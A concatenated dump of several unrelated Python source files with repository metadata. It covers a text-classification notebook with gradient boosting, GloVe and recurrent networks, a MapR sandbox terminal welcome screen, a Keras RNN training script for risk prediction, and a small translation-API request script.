clf = xgb.XGBClassifier(max_depth=7, n_estimators=200, colsample_bytree=0.8,
subsample=0.8, nthread=10, learning_rate=0.1)
clf.fit(xtrain_ctv.tocsc(), ytrain)
predictions = clf.predict_proba(xvalid_ctv.tocsc())
print ("logloss: %0.3f " % multiclass_logloss(yvalid, predictions))
# Fitting a simple xgboost on tf-idf svd features
clf = xgb.XGBClassifier(max_depth=7, n_estimators=200, colsample_bytree=0.8,
subsample=0.8, nthread=10, learning_rate=0.1)
clf.fit(xtrain_svd, ytrain)
predictions = clf.predict_proba(xvalid_svd)
print ("logloss: %0.3f " % multiclass_logloss(yvalid, predictions))
# Fitting a simple xgboost on tf-idf svd features
clf = xgb.XGBClassifier(nthread=10)
clf.fit(xtrain_svd, ytrain)
predictions = clf.predict_proba(xvalid_svd)
print ("logloss: %0.3f " % multiclass_logloss(yvalid, predictions))
mll_scorer = metrics.make_scorer(multiclass_logloss, greater_is_better=False, needs_proba=True)
# Initialize SVD
svd = TruncatedSVD()
# Initialize the standard scaler
scl = preprocessing.StandardScaler()
# We will use logistic regression here..
lr_model = LogisticRegression()
# Create the pipeline
clf = pipeline.Pipeline([('svd', svd), ('scl', scl), ('lr', lr_model)])
param_grid = {'svd__n_components' : [120, 180], 'lr__C': [0.1, 1.0, 10], 'lr__penalty': ['l1', 'l2']}
# Initialize Grid Search Model
model = GridSearchCV(estimator=clf, param_grid=param_grid, scoring=mll_scorer, verbose=10, n_jobs=-1, iid=True, refit=True, cv=2)
# Fit Grid Search Model
model.fit(xtrain_tfv, ytrain) # we can use the full data here but im only using xtrain
print("Best score: %0.3f" % model.best_score_)
print("Best parameters set:")
best_parameters = model.best_estimator_.get_params()
for param_name in sorted(param_grid.keys()):
print("\t%s: %r" % (param_name, best_parameters[param_name]))
nb_model = MultinomialNB()
# Create the pipeline
clf = pipeline.Pipeline([('nb', nb_model)])
# parameter grid
param_grid = {'nb__alpha': [0.001, 0.01, 0.1, 1, 10, 100]}
# Initialize Grid Search Model
model = GridSearchCV(estimator=clf, param_grid=param_grid, scoring=mll_scorer, verbose=10, n_jobs=-1, iid=True, refit=True, cv=2)
# Fit Grid Search Model
model.fit(xtrain_tfv, ytrain) # we can use the full data here but im only using xtrain.
print("Best score: %0.3f" % model.best_score_)
print("Best parameters set:")
best_parameters = model.best_estimator_.get_params()
for param_name in sorted(param_grid.keys()):
print("\t%s: %r" % (param_name, best_parameters[param_name]))
# load the GloVe vectors in a dictionary:
embeddings_index = {}
f = open('glove.840B.300d.txt')
for line in tqdm(f):
values = line.split()
word = values[0]
coefs = np.asarray(values[1:], dtype='float32')
embeddings_index[word] = coefs
f.close()
print('Found %s word vectors.' % len(embeddings_index))
# In[ ]:
# this function creates a normalized vector for the whole sentence
def sent2vec(s):
words = str(s).lower().decode('utf-8')
words = word_tokenize(words)
words = [w for w in words if not w in stop_words]
words = [w for w in words if w.isalpha()]
M = []
for w in words:
try:
M.append(embeddings_index[w])
except:
continue
M = np.array(M)
v = M.sum(axis=0)
if type(v) != np.ndarray:
return np.zeros(300)
return v / np.sqrt((v ** 2).sum())
# In[ ]:
xtrain_glove = [sent2vec(x) for x in tqdm(xtrain)]
xvalid_glove = [sent2vec(x) for x in tqdm(xvalid)]
# In[ ]:
xtrain_glove = np.array(xtrain_glove)
xvalid_glove = np.array(xvalid_glove)
# In[ ]:
# Fitting a simple xgboost on glove features
clf = xgb.XGBClassifier(nthread=10, silent=False)
clf.fit(xtrain_glove, ytrain)
predictions = clf.predict_proba(xvalid_glove)
print ("logloss: %0.3f " % multiclass_logloss(yvalid, predictions))
# In[ ]:
# Fitting a simple xgboost on glove features
clf = xgb.XGBClassifier(max_depth=7, n_estimators=200, colsample_bytree=0.8,
subsample=0.8, nthread=10, learning_rate=0.1, silent=False)
clf.fit(xtrain_glove, ytrain)
predictions = clf.predict_proba(xvalid_glove)
print ("logloss: %0.3f " % multiclass_logloss(yvalid, predictions))
# In[ ]:
# scale the data before any neural net:
scl = preprocessing.StandardScaler()
xtrain_glove_scl = scl.fit_transform(xtrain_glove)
xvalid_glove_scl = scl.transform(xvalid_glove)
# In[ ]:
# we need to binarize the labels for the neural net
ytrain_enc = np_utils.to_categorical(ytrain)
yvalid_enc = np_utils.to_categorical(yvalid)
# In[ ]:
# create a simple 3 layer sequential neural net
model = Sequential()
model.add(Dense(300, input_dim=300, activation='relu'))
model.add(Dropout(0.2))
model.add(BatchNormalization())
model.add(Dense(300, activation='relu'))
model.add(Dropout(0.3))
model.add(BatchNormalization())
model.add(Dense(3))
model.add(Activation('softmax'))
# compile the model
model.compile(loss='categorical_crossentropy', optimizer='adam')
# In[ ]:
model.fit(xtrain_glove_scl, y=ytrain_enc, batch_size=64,
epochs=5, verbose=1,
validation_data=(xvalid_glove_scl, yvalid_enc))
# In[ ]:
# using keras tokenizer here
token = text.Tokenizer(num_words=None)
max_len = 70
token.fit_on_texts(list(xtrain) + list(xvalid))
xtrain_seq = token.texts_to_sequences(xtrain)
xvalid_seq = token.texts_to_sequences(xvalid)
# zero pad the sequences
xtrain_pad = sequence.pad_sequences(xtrain_seq, maxlen=max_len)
xvalid_pad = sequence.pad_sequences(xvalid_seq, maxlen=max_len)
word_index = token.word_index
# In[ ]:
# create an embedding matrix for the words we have in the dataset
embedding_matrix = np.zeros((len(word_index) + 1, 300))
for word, i in tqdm(word_index.items()):
embedding_vector = embeddings_index.get(word)
if embedding_vector is not None:
embedding_matrix[i] = embedding_vector
# In[ ]:
# A simple LSTM with glove embeddings and two dense layers
model = Sequential()
model.add(Embedding(len(word_index) + 1,
300,
weights=[embedding_matrix],
input_length=max_len,
trainable=False))
model.add(SpatialDropout1D(0.3))
model.add(LSTM(100, dropout=0.3, recurrent_dropout=0.3))
model.add(Dense(1024, activation='relu'))
model.add(Dropout(0.8))
model.add(Dense(1024, activation='relu'))
model.add(Dropout(0.8))
model.add(Dense(3))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam')
# In[ ]:
model.fit(xtrain_pad, y=ytrain_enc, batch_size=512, epochs=100, verbose=1, validation_data=(xvalid_pad, yvalid_enc))
# In[ ]:
# A simple LSTM with glove embeddings and two dense layers
model = Sequential()
model.add(Embedding(len(word_index) + 1,
300,
weights=[embedding_matrix],
input_length=max_len,
trainable=False))
model.add(SpatialDropout1D(0.3))
model.add(LSTM(300, dropout=0.3, recurrent_dropout=0.3))
model.add(Dense(1024, activation='relu'))
model.add(Dropout(0.8))
model.add(Dense(1024, activation='relu'))
model.add(Dropout(0.8))
model.add(Dense(3))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam')
# Fit the model with early stopping callback
earlystop = EarlyStopping(monitor='val_loss', min_delta=0, patience=3, verbose=0, mode='auto')
model.fit(xtrain_pad, y=ytrain_enc, batch_size=512, epochs=100,
verbose=1, validation_data=(xvalid_pad, yvalid_enc), callbacks=[earlystop])
# In[ ]:
# A simple bidirectional LSTM with glove embeddings and two dense layers
model = Sequential()
model.add(Embedding(len(word_index) + 1,
300,
weights=[embedding_matrix],
input_length=max_len,
trainable=False))
model.add(SpatialDropout1D(0.3))
model.add(Bidirectional(LSTM(300, dropout=0.3, recurrent_dropout=0.3)))
model.add(Dense(1024, activation='relu'))
model.add(Dropout(0.8))
model.add(Dense(1024, activation='relu'))
model.add(Dropout(0.8))
model.add(Dense(3))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam')
# Fit the model with early stopping callback
earlystop = EarlyStopping(monitor='val_loss', min_delta=0, patience=3, verbose=0, mode='auto')
model.fit(xtrain_pad, y=ytrain_enc, batch_size=512, epochs=100,
verbose=1, validation_data=(xvalid_pad, yvalid_enc), callbacks=[earlystop])
# In[ ]:
# GRU with glove embeddings and two dense layers
model = Sequential()
model.add(Embedding(len(word_index) + 1,
300,
weights=[embedding_matrix],
input_length=max_len,
trainable=False))
model.add(SpatialDropout1D(0.3))
model.add(GRU(300, dropout=0.3, recurrent_dropout=0.3, return_sequences=True))
model.add(GRU(300, dropout=0.3, recurrent_dropout=0.3))
model.add(Dense(1024, activation='relu'))
model.add(Dropout(0.8))
model.add(Dense(1024, activation='relu'))
model.add(Dropout(0.8))
model.add(Dense(3))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam')
# Fit the model with early stopping callback
earlystop = EarlyStopping(monitor='val_loss', min_delta=0, patience=3, verbose=0, mode='auto')
model.fit(xtrain_pad, y=ytrain_enc, batch_size=512, epochs=100,
verbose=1, validation_data=(xvalid_pad, yvalid_enc), callbacks=[earlystop])
# In[ ]:
# this is the main ensembling class. how to use it is in the next cell!
import numpy as np
from sklearn.metrics import roc_auc_score
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import StratifiedKFold, KFold
import pandas as pd
import os
import sys
import logging
logging.basicConfig(
level=logging.DEBUG,
format="[%(asctime)s] %(levelname)s %(message)s",
datefmt="%H:%M:%S", stream=sys.stdout)
logger = logging.getLogger(__name__)
class Ensembler(object):
def __init__(self, model_dict, num_folds=3, task_type='classification', optimize=roc_auc_score,
lower_is_better=False, save_path=None):
"""
Ensembler init function
:param model_dict: model dictionary, see README for its format
:param num_folds: the number of folds for ensembling
:param task_type: classification or regression
:param optimize: the function to optimize for, e.g. AUC, logloss, etc. Must have two arguments y_test and y_pred
:param lower_is_better: is lower value of optimization function better or higher
:param save_path: path to which model pickles will be dumped to along with generated predictions, or None
"""
self.model_dict = model_dict
self.levels = len(self.model_dict)
self.num_folds = num_folds
self.task_type = task_type
self.optimize = optimize
self.lower_is_better = lower_is_better
self.save_path = save_path
self.training_data = None
self.test_data = None
self.y = None
self.lbl_enc = None
self.y_enc = None
self.train_prediction_dict = None
self.test_prediction_dict = None
self.num_classes = None
def fit(self, training_data, y, lentrain):
"""
:param training_data: training data in tabular format
:param y: binary, multi-class or regression
:return: chain of models to be used in prediction
"""
self.training_data = training_data
self.y = y
if self.task_type == 'classification':
self.num_classes = len(np.unique(self.y))
logger.info("Found %d classes", self.num_classes)
self.lbl_enc = LabelEncoder()
self.y_enc = self.lbl_enc.fit_transform(self.y)
kf = StratifiedKFold(n_splits=self.num_folds)
train_prediction_shape = (lentrain, self.num_classes)
else:
self.num_classes = -1
self.y_enc = self.y
kf = KFold(n_splits=self.num_folds)
train_prediction_shape = (lentrain, 1)
self.train_prediction_dict = {}
for level in range(self.levels):
self.train_prediction_dict[level] = np.zeros((train_prediction_shape[0],
train_prediction_shape[1] * len(self.model_dict[level])))
for level in range(self.levels):
if level == 0:
temp_train = self.training_data
else:
temp_train = self.train_prediction_dict[level - 1]
for model_num, model in enumerate(self.model_dict[level]):
validation_scores = []
foldnum = 1
for train_index, valid_index in kf.split(self.train_prediction_dict[0], self.y_enc):
logger.info("Training Level %d Fold # %d. Model # %d", level, foldnum, model_num)
if level != 0:
l_training_data = temp_train[train_index]
l_validation_data = temp_train[valid_index]
model.fit(l_training_data, self.y_enc[train_index])
else:
l0_training_data = temp_train[0][model_num]
if type(l0_training_data) == list:
l_training_data = [x[train_index] for x in l0_training_data]
l_validation_data = [x[valid_index] for x in l0_training_data]
else:
l_training_data = l0_training_data[train_index]
l_validation_data = l0_training_data[valid_index]
model.fit(l_training_data, self.y_enc[train_index])
logger.info("Predicting Level %d. Fold # %d. Model # %d", level, foldnum, model_num)
if self.task_type == 'classification':
temp_train_predictions = model.predict_proba(l_validation_data)
self.train_prediction_dict[level][valid_index,
(model_num * self.num_classes):(model_num * self.num_classes) +
self.num_classes] = temp_train_predictions
else:
temp_train_predictions = model.predict(l_validation_data)
self.train_prediction_dict[level][valid_index, model_num] = temp_train_predictions
validation_score = self.optimize(self.y_enc[valid_index], temp_train_predictions)
validation_scores.append(validation_score)
logger.info("Level %d. Fold # %d. Model # %d. Validation Score = %f", level, foldnum, model_num,
validation_score)
foldnum += 1
avg_score = np.mean(validation_scores)
std_score = np.std(validation_scores)
logger.info("Level %d. Model # %d. Mean Score = %f. Std Dev = %f", level, model_num,
avg_score, std_score)
logger.info("Saving predictions for level # %d", level)
train_predictions_df = pd.DataFrame(self.train_prediction_dict[level])
train_predictions_df.to_csv(os.path.join(self.save_path, "train_predictions_level_" + str(level) + ".csv"),
index=False, header=None)
return self.train_prediction_dict
def predict(self, test_data, lentest):
self.test_data = test_data
if self.task_type == 'classification':
test_prediction_shape = (lentest, self.num_classes)
else:
test_prediction_shape = (lentest, 1)
self.test_prediction_dict = {}
for level in range(self.levels):
self.test_prediction_dict[level] = np.zeros((test_prediction_shape[0],
test_prediction_shape[1] * len(self.model_dict[level])))
self.test_data = test_data
for level in range(self.levels):
if level == 0:
temp_train = self.training_data
temp_test = self.test_data
else:
temp_train = self.train_prediction_dict[level - 1]
temp_test = self.test_prediction_dict[level - 1]
for model_num, model in enumerate(self.model_dict[level]):
logger.info("Training Fulldata Level %d. Model # %d", level, model_num)
if level == 0:
model.fit(temp_train[0][model_num], self.y_enc)
else:
model.fit(temp_train, self.y_enc)
logger.info("Predicting Test Level %d. Model # %d", level, model_num)
if self.task_type == 'classification':
if level == 0:
temp_test_predictions = model.predict_proba(temp_test[0][model_num])
else:
temp_test_predictions = model.predict_proba(temp_test)
self.test_prediction_dict[level][:, (model_num * self.num_classes): (model_num * self.num_classes) +
self.num_classes] = temp_test_predictions
else:
if level == 0:
temp_test_predictions = model.predict(temp_test[0][model_num])
else:
temp_test_predictions = model.predict(temp_test)
self.test_prediction_dict[level][:, model_num] = temp_test_predictions
test_predictions_df = pd.DataFrame(self.test_prediction_dict[level])
test_predictions_df.to_csv(os.path.join(self.save_path, "test_predictions_level_" + str(level) + ".csv"),
index=False, header=None)
return self.test_prediction_dict
# In[ ]:
# specify the data to be used for every level of ensembling:
train_data_dict = {0: [xtrain_tfv, xtrain_ctv, xtrain_tfv, xtrain_ctv], 1: [xtrain_glove]}
test_data_dict = {0: [xvalid_tfv, xvalid_ctv, xvalid_tfv, xvalid_ctv], 1: [xvalid_glove]}
model_dict = {0: [LogisticRegression(), LogisticRegression(), MultinomialNB(alpha=0.1), MultinomialNB()],
1: [xgb.XGBClassifier(silent=True, n_estimators=120, max_depth=7)]}
ens = Ensembler(model_dict=model_dict, num_folds=3, task_type='classification',
optimize=multiclass_logloss, lower_is_better=True, save_path='')
ens.fit(train_data_dict, ytrain, lentrain=xtrain_glove.shape[0])
preds = ens.predict(test_data_dict, lentest=xvalid_glove.shape[0])
# In[ ]:
# check error:
multiclass_logloss(yvalid, preds[1])
| [
"noreply@github.com"
] | zzb5233.noreply@github.com |
77cfdee2094e65250b458eecb25ff296759d160d | 7c1fe2e98fd11d707909463e69ca70dcc18ffe66 | /files/welcome.py | 89b67d2cf308a02487621067cb40e5a86fdf68fb | [] | no_license | jsunmapr/mapr-sandbox-generator | d02162db2b8b30ba455915e18082520c46fdb933 | c590a4aa8fe54de9d5a729824e21bfe585c9d4a0 | refs/heads/master | 2020-12-31T01:36:19.952261 | 2015-05-07T18:12:52 | 2015-05-07T18:12:52 | 35,234,600 | 0 | 0 | null | 2015-05-07T17:48:52 | 2015-05-07T17:48:51 | Shell | UTF-8 | Python | false | false | 3,080 | py | #All Rights Reserved MapR
import curses
import sh
import subprocess
import os
screen = None
Width_Factor = 4
ip = sh.head(sh.awk(sh.getent("ahosts", sh.hostname().strip()),"{print $1}"),n="1").strip()
if not os.path.exists("/vmware"):
ip = "127.0.0.1"
ssh_cmd = ""
if ip == "127.0.0.1":
ssh_cmd = "ssh mapr@localhost -p 2222"
else:
ssh_cmd = "ssh mapr@%s" % (ip)
class NetworkMisconfiguredException(Exception):
pass
class ServiceFailedtoStartException(Exception):
pass
def make_welcome_window():
Height, Width = screen.getmaxyx()
welcome_win = screen.subwin(Height / 2 - Width_Factor - 2, Width, 0, 0)
welcome_win.box()
welcome_win.addstr(1,2,"=== MapR-Platfora-Sandbox-For-Hadoop ===", curses.A_BOLD)
welcome_win.addstr(3,2,"Version: 4.0.2")
def make_status_window():
Height, Width = screen.getmaxyx()
status_win = screen.subwin(Height / 2 - Width_Factor / 2, Width, Height / 2 - Width_Factor, 0)
status_win.box()
status_win.addstr(1,2,"MapR-Platfora-Sandbox-For-Hadoop installation finished successfully.", curses.A_BOLD)
status_win.addstr(2,2,"Please go to http://%s:8443/ to begin your experience." % ip) #Fixme: Is there a way to detect, how networking is setup on a VM, nat, bridged etc?
status_win.addstr(4,2,"Open a browser on your host machine ")
status_win.addstr(5,2,"and enter the URL in the browser's address field.")
status_win.addstr(7,2,"You can access the host via SSH by %s" % (ssh_cmd))
if os.path.exists("/opt/mapr/hue"):
status_win.addstr(8,2,"The following credentials should be used for MCS & HUE - mapr/mapr")
def make_hint_window():
Height, Width = screen.getmaxyx()
hint_win = screen.subwin(Width_Factor, Width, Height - Width_Factor, 0)
hint_win.box()
hint_win.addstr(1,1,"Log in to this virtual machine: Linux/Windows <Alt+F2>, Mac OS X <Option+F5>")
def init_screen():
curses.noecho()
make_welcome_window()
make_status_window()
make_hint_window()
def show_netinfo():
commands = [
"route -n",
"getent ahosts",
"ip addr",
"cat /etc/resolv.conf",
"cat /etc/hosts",
]
f = file("/tmp/netinfo", "w")
for cmd in commands:
f.write("==== %s ==== \n" % cmd)
f.write(subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).communicate()[0])
f.write("\n")
f.close()
subprocess.call("less /tmp/netinfo", shell=True)
def main():
global screen
screen = curses.initscr()
init_screen()
screen.refresh()
curses.curs_set(0)
import sys
if len(sys.argv)>1 and sys.argv[1] == "-s":
screen.getch()
else:
while True:
try:
c = screen.getch()
if c == ord('n'):
curses.endwin()
show_netinfo()
screen = curses.initscr()
init_screen()
screen.refresh()
except KeyboardInterrupt, e:
pass
curses.endwin()
if __name__ == '__main__':
main()
| [
"jsun@mapr.com"
] | jsun@mapr.com |
8a42618209e10302a03f5103172cce045ca6d684 | 7ba571fba2a15f1e1da98ec996776549d6897696 | /trainings/Baseline_RNN_Y10/TR014_MV03R00_OV01R00_DP02R00_riskm_full.py | d02df016ad13a85dd44dd28620095c1fbb8369aa | [] | no_license | schorscho/RiskM | 8b1ca176bf24c216a0bc6c1045a3daba94ec2a76 | 57dd3f0be5afafc99da79978cc9328db45e515e2 | refs/heads/master | 2020-03-11T20:48:12.368465 | 2018-05-07T08:51:35 | 2018-05-07T08:51:35 | 130,244,554 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,277 | py | import sys
import os
import pickle
from time import time
from math import sqrt
from shutil import copyfile
import numpy as np
import pandas as pd
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from sklearn.metrics import mean_squared_error
from sklearn.preprocessing import StandardScaler
from keras.callbacks import Callback, LearningRateScheduler
from keras.layers import Input, Dense, CuDNNGRU, Bidirectional
from keras.models import Model, load_model
from keras.utils import multi_gpu_model
from keras.utils.vis_utils import plot_model
from riskm_config import RMC, time_it, logger
from data_preparation import load_all_data
def build_keras_model():
ip = Input(shape=(RMC.INPUT_LEN, RMC.INPUT_DIM), name='Input_Sequence')
op = Bidirectional(CuDNNGRU(units=600, return_sequences=True, name='RNN_1'))(ip)
op = Bidirectional(CuDNNGRU(units=600, return_sequences=True, name='RNN_2'))(op)
op = Bidirectional(CuDNNGRU(units=600, name='RNN_3'))(op)
op = Dense(600, name='Dense_1')(op)
op = Dense(300, name='Dense_2')(op)
op = Dense(200, name='Dense_3')(op)
op = Dense(1, name='Prediction')(op)
model = Model(ip, op)
return model
def lr_schedule(ep):
lr = 0.001
lr = lr / (ep // 10 + 1)
logger.info('New learning rate: %01.10f', lr)
return lr
def compile_keras_model(model):
#adam = Adam(lr=0.001, beta_1=0.9, beta_2=0.999, decay=0.00, clipnorm=1.0) #epsilon=None (doesn't work)
if RMC.GPUS > 1:
model = multi_gpu_model(model, gpus=RMC.GPUS)
model.compile(optimizer='adam', loss='mse', metrics=['mape'])
return model
def create_feature_prep_pipeline():
return StandardScaler()
def apply_feature_prep_pipeline(x, fpp, fit):
print(x.shape)
x = x.reshape(-1, RMC.INPUT_DIM)
print(x.shape)
if fit:
x = fpp.fit_transform(x)
else:
x = fpp.transform(x)
print(x.shape)
x = x.reshape(-1, RMC.INPUT_LEN, RMC.INPUT_DIM)
print(x.shape)
return x
def load_feature_prep_pipeline(model_dir, model_file):
fpp = pickle.load(open(os.path.join(model_dir, model_file + '_fpp.p'), 'rb'))
return fpp
def save_feature_prep_pipeline(fpp, model_dir, model_file):
pickle.dump(fpp, open(os.path.join(model_dir, model_file + '_fpp.p'), 'wb'))
def previous_keras_model_file_exists(model_dir, model_file_name):
return os.path.exists(os.path.join(model_dir, model_file_name + '_model.h5'))
def load_keras_model(model_dir, model_file_name):
model = load_model(os.path.join(model_dir, model_file_name + '_model.h5'))
return model
def save_keras_model(model, model_dir, model_file_name):
model.save(os.path.join(model_dir, model_file_name + '_model.h5'))
def save_training_history(history, model_dir, model_file_name):
hist = pd.DataFrame.from_dict(history.history)
hist['epoch'] = [i + 1 for i in range(len(hist))]
hist.set_index('epoch', inplace=True)
hist.to_csv(path_or_buf=os.path.join(model_dir, model_file_name + '_history.csv'))
plt.plot(hist['loss'])
plt.plot(hist['val_loss'])
plt.yscale('log')
plt.title('Model Loss')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.legend(['Train', 'Test'], loc='upper right')
fig = plt.gcf()
fig.set_size_inches(12, 8)
fig.savefig(os.path.join(model_dir, model_file_name + '_history.png'), dpi=100)
def save_model_graph_and_summary(model, model_dir, model_file_name):
plot_model(model, to_file=os.path.join(model_dir, model_file_name + '_model.png'), show_shapes=True)
with open(os.path.join(model_dir, model_file_name + '_model.txt'), 'w') as fh:
model.summary(print_fn=lambda x: fh.write(x + '\n'))
# def save_validation_results():
# # This is because we deleted scenario 2053 (index 2052 in numpy array) from data set
# val_i[val_i > 2051] += 1
#
# test_result = pd.DataFrame(
# {RMC.SCEN_ID_COL: val_i + 1, 'y': y, 'y_pred': y_p, 'Difference': y - y_p, 'Deviation': (y - y_p) * 100 / y})
# test_result.set_index(RMC.SCEN_ID_COL, inplace=True)
# test_result.sort_index(inplace=True)
#
# skl_mse = mean_squared_error(y, y_p)
# skl_rmse = sqrt(skl_mse)
#
# if model_file_name is not None:
# with open(os.path.join(model_dir, model_file_name + '_train_results.csv'), "w") as file:
# file.write("Best Epoch: {0}, Val MSE: {1}, Val RMSE: {2}\n".format(mt_callback.best_epoch, skl_mse, skl_rmse))
# file.write("\n")
# test_result.to_csv(path_or_buf=file, columns=['y', 'y_pred', 'Difference', 'Deviation'])
# file.write(",,,, {0}\n".format(np.mean(np.absolute(y - y_p) * 100 / y)))
def copy_this_file(model_dir, model_file_name):
this_file_name = os.path.join(RMC.SRC_DIR, RMC.THIS_FILE + '.py')
copy_file_name = os.path.join(model_dir, model_file_name + '_' + RMC.THIS_FILE + '.py')
copyfile(this_file_name, copy_file_name)
class Model_Tracker(Callback):
def __init__(self, model_dir, model_file_name, model):
super(Callback, self).__init__()
self.model = model
self.file_name = model_file_name
self.dir = model_dir
self.best_epoch = None
self.best_val_loss = None
def on_epoch_end(self, epoch, logs=None):
val_loss = logs['val_loss']
if self.best_val_loss is None or self.best_val_loss > val_loss:
self.best_epoch = epoch
self.best_val_loss = val_loss
save_keras_model(self.model, self.dir, self.file_name)
print("New model version saved - val_rmse ({:.6f})".format(sqrt(val_loss)))
def execute_train(model_dir, model_file_name, start_epoch, end_epoch, fpp, build_on_model,
train_x, train_y, train_i, val_x, val_y, val_i):
if fpp is None:
fpp = create_feature_prep_pipeline()
fit = True
else:
fit = False
x_t = apply_feature_prep_pipeline(x=train_x, fpp=fpp, fit=fit)
y_t = train_y
x_v = apply_feature_prep_pipeline(x=val_x, fpp=fpp, fit=False)
y_v = val_y
logger.info('Building/compiling model ...')
if build_on_model is None:
model = build_keras_model()
model = compile_keras_model(model)
else:
model = build_on_model
callbacks = [LearningRateScheduler(lr_schedule)]
mt_callback = None
if model_file_name is not None:
mt_callback = Model_Tracker(model_dir, model_file_name, model=model)
callbacks.append(mt_callback)
save_model_graph_and_summary(model, model_dir, model_file_name)
save_feature_prep_pipeline(fpp, model_dir, model_file_name)
copy_this_file(model_dir, model_file_name)
logger.info('Building/compiling model done.')
logger.info('Fitting model ...')
history = model.fit(
x=[x_t], y=y_t,
batch_size=RMC.BATCH_SIZE,
epochs=end_epoch,
verbose=1,
callbacks=callbacks,
shuffle=True,
initial_epoch=start_epoch,
steps_per_epoch=None,
validation_data=[[x_v], y_v])
if model_file_name is not None:
save_training_history(history, model_dir, model_file_name)
y_p = model.predict(x_v, verbose=1)
y = np.reshape(a=y_v, newshape=(len(y_v),))
y_p = np.reshape(a=y_p, newshape=(len(y_v),))
# This is because we deleted scenario 2053 (index 2052 in numpy array) from data set
val_i[val_i > 2051] += 1
test_result = pd.DataFrame(
{RMC.SCEN_ID_COL: val_i + 1, 'y': y, 'y_pred': y_p, 'Difference': y - y_p, 'Deviation': (y - y_p) * 100 / y})
test_result.set_index(RMC.SCEN_ID_COL, inplace=True)
test_result.sort_index(inplace=True)
skl_mse = mean_squared_error(y, y_p)
skl_rmse = sqrt(skl_mse)
if model_file_name is not None:
with open(os.path.join(model_dir, model_file_name + '_train_results.csv'), "w") as file:
file.write("Best Epoch: {0}, Val MSE: {1}, Val RMSE: {2}\n".format(mt_callback.best_epoch, skl_mse, skl_rmse))
file.write("\n")
test_result.to_csv(path_or_buf=file, columns=['y', 'y_pred', 'Difference', 'Deviation'])
file.write(",,,, {0}\n".format(np.mean(np.absolute(y - y_p) * 100 / y)))
logger.info('Fitting model done.')
return fpp, model
def execute_test(fpp, model, test_x, test_y, test_i, model_dir, model_file_name):
logger.info("Testing model ...")
x = apply_feature_prep_pipeline(x=test_x, fpp=fpp, fit=False)
y = test_y
y_p = model.predict(x, verbose=1)
y = np.reshape(a=y, newshape=(len(y),))
y_p = np.reshape(a=y_p, newshape=(len(y),))
test_result = pd.DataFrame(
{RMC.SCEN_ID_COL: test_i + 1, 'y': y, 'y_pred': y_p, 'Difference': y - y_p, 'Deviation': (y - y_p) * 100 / y})
test_result.set_index(RMC.SCEN_ID_COL, inplace=True)
test_result.sort_index(inplace=True)
skl_mse = mean_squared_error(y, y_p)
skl_rmse = sqrt(skl_mse)
print(" - test_skl_mse ({:.6f}), test_skl_rmse ({:.6f})".format(skl_mse, skl_rmse))
print('\n')
if model_dir is not None:
with open(os.path.join(model_dir, model_file_name + '_test_results.csv'), "w") as file:
file.write("Test MSE: {0}, Test RMSE: {1}\n".format(skl_mse, skl_rmse))
file.write("\n")
test_result.to_csv(path_or_buf=file, columns=['y', 'y_pred', 'Difference', 'Deviation'])
file.write(",,,, {0}\n".format(np.mean(np.absolute(y - y_p) * 100 / y)))
def main():
overall = time()
logger.info("Main script started ...")
train = False
test = False
fpp = None
model = None
model_file_name = None
model_dir = None
for arg in sys.argv[1:]:
if arg == 'train':
train = True
elif arg == 'test':
test = True
if not train and not test:
train = True
train_x, train_y, train_i, val_x, val_y, val_i, test_x, test_y, test_i = load_all_data(
train_set=train,
val_set=train,
test_set=test,
init=False)
if train or test:
if RMC.TRN is not None:
model_file_name = '{0}_{1}_{2}_{3}'.format(RMC.TRN, RMC.MV, RMC.OV, RMC.DP)
model_dir = os.path.join(RMC.OUTPUT_DIR, model_file_name)
if not os.path.exists(model_dir) and train:
os.makedirs(model_dir)
if previous_keras_model_file_exists(model_dir, model_file_name):
logger.info("Loading model ...")
fpp = load_feature_prep_pipeline(model_dir, model_file_name)
model = load_keras_model(model_dir, model_file_name)
logger.info("Loading model done.")
if train:
fpp, model = execute_train(model_dir, model_file_name,
start_epoch=RMC.START_EP, end_epoch=RMC.END_EP,
fpp=fpp, build_on_model=model,
train_x=train_x, train_y=train_y, train_i=train_i,
val_x=val_x, val_y=val_y, val_i=val_i)
if test:
execute_test(fpp, model, test_x, test_y, test_i, model_dir, model_file_name)
logger.info("Main script finished in %s.", time_it(overall, time()))
if __name__ == "__main__":
main()
| [
"georg.opora@gmail.com"
] | georg.opora@gmail.com |
090349fdd15c156fdcb78086468aea359e3a8768 | b00ff7ad874565b3c53ac0d1192c4677ed27a3c9 | /traslation/test2.py | 4c27bcb1676eaa8072b93e2e64b24ae6309da4e1 | [] | no_license | XieYanJY/Python-study | be7dea2262035327baee8d6d65fc661c7e169b25 | 59230675b6ed1280f9c51d5165cf8c397d902c4d | refs/heads/master | 2023-05-28T08:49:21.588035 | 2021-06-10T02:57:43 | 2021-06-10T02:57:43 | 375,550,677 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 888 | py | import requests
import json
word = input('请输入:')
data = {
'i': word,
'from': 'AUTO',
'to':' AUTO',
'smartresult': 'dict',
'client': 'fanyideskweb',
'salt': '16061061122206',
'sign': 'a6f391b5a4a84296714d298f77a75977',
'lts': '1606106112220',
'bv': '33bafbf137bd0b36cd4f1ffa3b0dd45b',
'doctype': 'json',
'version': 2.1,
'keyfrom': 'fanyi.web',
'action': 'FY_BY_REALTlME'
}
def get_page(url):
r = requests.get(url, params=data)
exit if not r.status_code == requests.codes.ok else print('Request Successfully')
# print(type(r))
msg = r.json()
# print(type(msg))
# print(msg)
print(msg['translateResult'][0][0]['tgt'])
if __name__ == '__main__':
url = 'https://fanyi.youdao.com/translate?smartresult=dict&smartresult=rule'
get_page(url)
| [
"wd962464wd@gmail.com"
] | wd962464wd@gmail.com |
e87170f2dc27a46b4824d0f1e382bbe1073e3a92 | 73b99f2ffb5b8de3acfecb0b4bffe744af841f38 | /ef/config/components/spatial_mesh.py | 5896772c850db119fbdda1a0dc6dd3d53f11450f | [
"MIT"
